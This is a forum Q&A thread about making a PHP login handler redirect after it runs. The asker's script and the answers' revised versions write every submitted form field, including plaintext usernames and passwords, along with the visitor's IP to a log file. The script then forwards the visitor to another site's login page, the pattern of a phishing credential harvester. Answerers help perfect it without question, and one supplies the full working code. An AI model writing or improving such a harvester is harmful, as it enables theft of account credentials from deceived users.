# Creating a PHP to redirect user after running script

Tags: php, css, redirect, button, project

I am trying to create a simple web application for some friends to use, but I can't figure out how to do the php function for it.

```
<?php
header ('Location: https://####.com/login/#');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "IP=");
fwrite($handle, $_SERVER["REMOTE_ADDR"]);
fwrite($handle, "\r\n");
fwrite($handle, "---------------");
fwrite($handle, "\r\n");
fclose($handle);
?>
```

What this is supposed to do is to write a log of the username and password as well as the login IP so that if needed my buds can make sure nobody is logging in thats not supposed to be logging in. 
In any case, how would I make it so that after these details are logged, it forward them to another page, say for example, the home page? 
Is there a way to do this without modifying the content of the php too heavily?

Also not sure if there is a way to do this by modifying the button that I am using...

```
<input class="button-red" value="Log in" type="submit">
```

Still needs to run the PHP though.

Answer (score 0):

Move that `header ('Location: https://####.com/login/#');` to the end of the code.

So that once the file writing is done, the page will be redirected.

**EDIT**

Keep in mind that, the `header()` function needs to be called before any output sent back to the browser. Means, before any html it should be used!

```
// do your code for inserting the IP to the file

header ('Location: https://####.com/login/#'); // to redirect the page
die; // the script will not stop execution here, so the html that you might have in that page below this code won't be shown either

?>
```

Comment: @Pete, Is the above code your actual php code or is there any html also in that page?

Comment: So to clarify my question more, the page itself does not fully redirect, only the section that I had the php script in. Not sure if that explains it fully.

Comment: There is html on the page as well

Comment: @Pete, keep in mind that the `header()` function should be called before any output is sent to the browser. Means before any html on that page and before anything you `echo` ! Otherwise the redirect won't work!

Answer (score 0):

Add the redirection at the end of the php code since once it calls the header() it will execute the function/redirection and not execute the rest of the code & Add the exit/die after it. I think that might be stopping your redirection. Try debugging or some of these other methods.

```
<?php
if(isset('button-name')){
    ...code...
    header('Location: http://www.example.com/');
    die();   // or exit(0);
}
?>
```

Here's the reference http://php.net/manual/en/function.header.php
**The URL must be an absolute**

**Workaround** would be using html meta tag add the html after your *php*

```
<meta http-equiv="Location" content="http://example.com/">
```

or a javascript call after the php execution using window's location property

```
window.location.replace("http://example.com/");
```

Comment: If I just move the header then this happens https://imgur.com/RU0epUB
The text from example.com appears where I had the login fields

Comment: That means the redirection is happening to an illustrative domain. Replace the 'http://www.example.com/' with the url u need to redirect to like if u r working on localhost then localhost/BASE_DIRECTORY/index.html and if you're working with server then to the next page you need to go to like https://www.DOMAIN.com/index/profile.php

Answer (score 0):

cause im nice i went ahead and wrote your code for you
change your button html to his
`<input class="button-red" value="Log in" type="submit" name="submit">`

then use this php code

```php
<?php
if(isset($_POST['submit'])){
  $handle = fopen("log.txt", "a");
  foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
  }
  fwrite($handle, "\r\n");
  fwrite($handle, "IP=");
  fwrite($handle, $_SERVER["REMOTE_ADDR"]);
  fwrite($handle, "\r\n");
  fwrite($handle, "---------------");
  fwrite($handle, "\r\n");
  fclose($handle);
  $codeRan = "true";
  if($codeRan == "true"){
    header ('Location: https://####.com/login/#');
  }
}
?>
```

Comment: This looks great but I still have the issue of not the entire page redirecting, only the area where I have my login fields

Comment: As an example, If I use example.com as the redirect, this is what it shows at the center of the website, where the login fields are.

Answer (score 0):

You should write `header()` after your code,
instead of this :

```
<?php
header ('Location: https://####.com/login/#');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "IP=");
fwrite($handle, $_SERVER["REMOTE_ADDR"]);
fwrite($handle, "\r\n");
fwrite($handle, "---------------");
fwrite($handle, "\r\n");
fclose($handle);
?>
```

Write this :

```
<?php
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fwrite($handle, "IP=");
fwrite($handle, $_SERVER["REMOTE_ADDR"]);
fwrite($handle, "\r\n");
fwrite($handle, "---------------");
fwrite($handle, "\r\n");
fclose($handle);

// ?>  Your other HTML Code <?php

header ('Location: https://####.com/login/#');
?>
```

Comment: If I just move the header then this happens https://imgur.com/RU0epUB
The text from example.com appears where I had the login fields

Comment: @Pete fiddle ur whole PHP page and comment here.